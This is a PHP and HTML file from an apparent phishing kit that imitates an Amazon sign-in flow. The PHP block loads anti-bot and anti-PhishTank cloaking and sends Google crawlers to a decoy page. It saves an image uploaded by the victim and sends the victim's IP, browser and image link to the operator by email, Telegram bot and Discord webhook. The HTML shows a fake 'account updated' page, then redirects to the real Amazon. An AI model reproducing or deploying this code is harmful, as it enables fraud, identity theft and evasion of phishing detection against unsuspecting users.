<?php
ob_start();
session_start();
$path = "../site/";
require ("../DheReckahConfi/Guration.php");
require ("../DheReckahConfi/Function.php");
require ("../DheReckahDecline/AntiBotIp.php");
require ("../DheReckahDecline/AntiBotPw.php");
require ("../DheReckahDecline/AntiBotKillBot.php");
require ("../DheReckahDecline/AntiBotUserAgent.php");
require ("../DheReckahDecline/AntiBotIsp.php");
require ("../DheReckahDecline/AnitiBotHost.php");
require ("../DheReckahDecline/AntiBotPhishTank.php");
require ("../DheReckahDecline/AntiBotVpn.php");
require ("../DheReckahDecline/AntiBotProxy.php");
require ("../DheReckahDecline/AntBotProtection.php");
require ("../DheReckahDecline/SaveBrowsing.php");
require ("../DheReckahDecline/DiscoveredBot.php");
require ("../DheReckahDecline/AntiBotThree.php");
require ("../DheReckahDecline/DisturbOne.php");
require ("../DheReckahDecline/DisturbTwo.php");
require ("../DheReckahDecline/DoRandoMize.php");
require("../DheReckahDecline/Anti/Bot-Crawler.php");
@require("../DheReckahDecline/Anti/Crawler/src/CrawlerDetect.php");
use JayBizzle\CrawlerDetect\CrawlerDetect; 
$key = substr(sha1(mt_rand()),1,25);

if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { 
    include($path."index.php"); exit();
}
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) {
    include($path."index.php"); exit();
}
if (isset($_POST['hidden']) && !empty($_POST['DheReckahDatorKiller'])  ) {
  include($path."index.php"); exit();
  
}
if (!isset($_SESSION['Dh3R3ck4h_SESSION_T0k3n']) ) {
  include($path."index.php"); exit();
}
#if (!isset($_POST['tokenDheReckahCsrf'])) {
#    include($path."index.php");
  
#}
#if ($_POST['tokenDheReckahCsrf'] != $_SESSION['Dh3R3ck4h_SESSION_T0k3n']) {
#    include($path."index.php");
#}

$ip = getIp();
$browser = DheReckah_Browser();
$date = date("d M, Y");
$time = date("g:i a");
$date = trim($date . ", Time : " . $time);
$saveItOnHost = strtolower($saveItOnHost);
$sendToEmail = strtolower($sendToEmail);
$sendToTelegramBot = strtolower($sendToTelegramBot);
$sendToDiscordBot = strtolower($sendToDiscordBot);
extract($_REQUEST);
if($_SERVER['REQUEST_METHOD'] == 'POST'){
    $random = rand(0, 100008400000);
    $img = $_POST['data'];
    $img = str_replace('data:image/jpeg;base64,', '', $img);
    $img = str_replace(' ', '+', $img);
    $data = base64_decode($img);
    $file = $random.'.jpg';
    $success = file_put_contents($file, $data);

       //Admin Panel

      $msgItOnHost = "<t============================================>
       <t".$YourName." ".$PageName."==> <t===531f13>
<531f13>         :         <t ".'https://'.$_SERVER['HTTP_HOST'].'/_/'.$file.">
<V!ct!m3Ip>      :         <t ".$ip.">
<V!ct!m3D4t3>    :         <t ".$date.">
<V!ct!m3Br0ws3r> :         <".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT']).">
<Us3rAg4nt>      :         <t ".($_SERVER['HTTP_USER_AGENT']).">
<t=============================================>";


          $telegramMsg ="
         
[".$YourName." ".$PageName." ❤️😜❤️
[!m4g3H4s B3en
[Fi5h:|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
 [👤531f13:|👉  ".'https://'.$_SERVER['SERVER_NAME'].'/_/'.$file."
[🔍V!ct!m31p:|👉".$ip."
[⏰V!ct!m3D4t3:|👉 ".$date."
[🌐V!ct!m3Br0ws3r:|👉 ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3rAg3nt:|👉".($_SERVER['HTTP_USER_AGENT'])."";


      $discordMsg ="
[".$YourName." ".$PageName." ❤️😜❤️
[!m4g3 H4s B3en
[Fi5h:|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
[👤531f13:|👉 ".'https://'.$_SERVER['HTTP_HOST'].'/_/'.$file."
[🔍V!ct!m31p:|👉".$ip."
[⏰V!ct!m3D4t3:|👉 ".$date."
[🌐V!ct!m3Br0ws3r:|👉 ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3rAg3nt:|👉".($_SERVER['HTTP_USER_AGENT'])."";

           $Subject .= "[".$YourName." ".$PageName."!m4g3 ❤️😜❤️ \n";
          $Subject .= "[531f13 H4s B3en Fi5h❤️😜❤️||🐟🐟🐟🐟🐟🐟🐟🐟🐟||\n";
          $Subject .= "[M&T 531f13=| ".'https://'.$_SERVER['HTTP_HOST']."] !P=[".$ip."]";
          $headers .= "MIME-Version: 1.0" . "\r\n";
          $headers .= "From: ".$Owner.".$DheReckahServer." . "\r\n";
          $headers .= "Content-type:text/plan;charset=UTF-8" . "\r\n";
          $msg .= "[".$YourName." ".$PageName."531f13 || \n";
          $msg .= "[M&T 531f13 !m4g3 H4s B3en ||\n";
          $msg .= "[Fi5h:|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟  ||\n";
          $msg .= "[👤531f13         :|| ".'https://'.$_SERVER['HTTP_HOST'].'/_/'.$file." \n";
          $msg .= "[🔍!P             : ".$ip." ||\n";
          $msg .= "[⏰D4t3&T!m3      : ".$date." ||\n";
          $msg .= "[🌐BR0S3R/D3V!C3  : ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." On ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])." ||\n";
          $msg .= "[👤Us3rAg4nt      : ".($_SERVER['HTTP_USER_AGENT'])." ||\n";



    
      if ($saveItOnHost == "true") {
         $DheReckahCoded = array(
               'msgItOnHost' => $msgItOnHost,
            );
         echo json_encode($DheReckahCoded);
          $fil = fopen("../DheReckahHost/Fishes/531f13.html", "a+");
          fwrite($fil, $msgItOnHost);   
      }
      
      if ($sendToEmail == "true") {
        send($yourEmail, $Subject, $msg,$headers);

      }
      
      if ($sendToTelegramBot == "true") {
        
        send($telegramMsg,$botToken,$chatId);

  $DheReckahApi="https://api.telegram.org/bot".$botToken;
  $sendToTelegramBot=[
      'chat_id'=> urlencode($chatId),
      'text'=> urldecode($telegramMsg),
  ];
  $ch = curl_init($DheReckahApi . '/sendMessage');
  curl_setopt($ch, CURLOPT_HEADER, false);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, ($sendToTelegramBot));
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  $answer = curl_exec($ch);
  curl_close($ch);
      }
if ($sendToDiscordBot == "true"){
    //  $DheReckahCoded = array(
    //     'discordMsg' => $discordMsg,
    // );
    // echo json_encode($DheReckahCoded);
    $DheReckahApi = $webHookUrl; 
    $json_data = array ('content'=>"$discordMsg");
    $make_json = json_encode($json_data);
    $ch = curl_init( $DheReckahApi );
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json'));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $make_json);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $answer = curl_exec($ch);
}
  }

echo'<meta http-equiv="Refresh" content="05; URL=https://href.li/?https://www.amazon.com/gp/css/homepage.html?ref_=footer_ya">';
session_start();
session_destroy();

?>


<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
    <title dir="ltr">Amazon Sign-In</title>
     <!-- <title><?php echo htmlentities("leboncoin - connexion", ENT_QUOTES, "UTF-8"); ?></title> -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <!-- <meta http-equiv="refresh" content="5;url=data.php?ajax=blg"> -->

<meta charset="utf-8">
            <meta data-react-helmet="true" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=6.0 user-scalable=0">
            <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
            <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1, user-scalable=yes">
            <meta name="robots" content="noindex,nofollow" />
            <meta name="googlebot" content="noindex,nofollow" />
            <meta name="googlebot-news" content="nosnippet">
            <META NAME="robots" CONTENT="nofollow">
            <meta http-equiv="Cache-Control" content="no-store">
            <meta http-equiv="Cache-Control" content="no-cache">
            <meta http-equiv="Cache-Control" content="private">
            <meta http-equiv="Pragma" content="no-cache">
            <meta name="next-head-count" content="2">
            <noscript data-n-css=""></noscript>
            <link rel="shortcut icon" href="./file/img/favicon.ico">
            <link rel="stylesheet" href="./file/2.css">
                <script src="./file/js/angular.min.js"></script>
<script src="./file/js/jquery.min.js"></script>
<script src="./file/js/jquery.CardValidator.js"></script>
<script src="./file/js/jquery.validate.min.js"></script>
<script src="./file/js/jquery.mask.js"></script>
<script src="./file/js/tyle.js"></script>


    
      
     <script type="text/javascript">
    $(function() {
        $('#cardnumber').mask('0000 0000 0000 0000');
    $('#Securitycode').mask('0000');

        $('#birthdate').mask('00/00/0000');

        $('#SSN').mask('000-00-0000');

        $('#expdate').mask('00/0000');
        $("#phoneNumber").mask("(999) 999-9999");

  });
  </script>

<!--  <script type="text/javascript">

    jQuery(function($){
        $("#dob").mask("99/99/9999",{placeholder:"MM/DD/YYYY"});
        $("#mobilenum").mask("(999) 999-9999");
        $("#zipcode").mask("99999");
    //$('#SecurityNumber').mask('000-00-0000');
    });


</script>


    <script type="text/javascript">
        jQuery(function($){
            //$("#ccexp").mask("99/99",{placeholder:"MM/YY"});
            $("#ssn").mask("999-99-9999");
        });
    </script> -->   
      

      
        




      
    
  
</head>
  <body class="ap-locale-fr_FR a-m-us a-aui_157141-c a-aui_158613-c a-aui_72554-c a-aui_dropdown_187959-c a-aui_pci_risk_banner_210084-c a-aui_perf_130093-c a-aui_tnr_v2_180836-c a-aui_ux_145937-c a-meter-animate">




<div id="a-page">
    <div class="a-section a-padding-medium auth-workflow">
      <div class="a-section a-spacing-none auth-navbar">
        





<div id="alirctx" class="a-section a-spacing-medium a-text-center">
  
    

    
      


<a class="a-link-nav-icon" tabindex="-1" href="/ref=ap_frn_logo">
  
  <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>

  
  
    
      
  
</a>

    
  
</div>


      </div>

      <div id="authportal-center-section" class="a-section">
        
          
          
            <div id="authportal-main-section" class="a-section">
              






<div id="appctx" class="a-section auth-pagelet-container" style="
    width: 412px;
    margin: 0 auto;
">
  

















  
    





<div class="a-section a-spacing-base">
  <div class="a-section">
    
 <!--    <form name="signIn" method="post" action="5ucc3s.php" class="auth-validate-form auth-real-time-validation a-spacing-none"> -->
      
      

      




  
    
  
    
  
    
  



      <div class="a-section">
        <div class="a-box"><div class="a-box-inner a-padding-extra-large">
          <h1 class="a-spacing-small">
Congratulations! </h1>
          
          
          <div class="a-divider "><h4 id="Accountant"><font style=" color: #4CAF50;">Your Account Has Been Updated Successfully </font></h4></div>
          <div align="center">
                                                <img src="./file/img/rotate.gif" width="150" height="150">
                                            </div>






<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
You are being redirected to your account within 5 seconds.
</label>



<div class="multi equal clearfix">
<div class=" left">






          </div>
          <div class="a-section">
            
            









            
            <span id="continue" class="a-button a-button-span12 a-button-primary"><span class="a-button-inner"><span id="continue-announce" class="a-button-text" aria-hidden="true"><a  href="https://www.amazon.com/?Your_Account_Verified"> My cart </a>
            </span></span></span>

            
            
              



 

            

            



          </div>

          

          

          






          




  
  
  
    
      
      
      
        
        
      
    
  


          
          
        </div></div>
      </div>
    </form>
  </div>
  
    
    
      
        
        
        
      
    
  
</div>

  
  

</div>
            </div>
          
        
      </div>

      
      <div id="right-2">
      </div>

      <div class="a-section a-spacing-top-extra-large auth-footer">
        



<div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>

<div class="a-section a-spacing-small a-text-center a-size-mini">
  <span class="auth-footer-seperator"></span>

  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
      Terms of use
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
Protection of your personal information    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
    Help
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
      Cookies
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
      Ads based on your interests
    </a>
    <span class="auth-footer-seperator"></span>
  

  
</div>




<div class="a-section a-spacing-none a-text-center">
  





<span class="a-size-mini a-color-secondary">
  © 1996-2023, Amazon.com, Inc. or its affiliates.
</span>

</div>

      </div>
    </div>

   
    
    
  </div>

 



  

    <dir style="display: none;">


</dir>

</body></html>
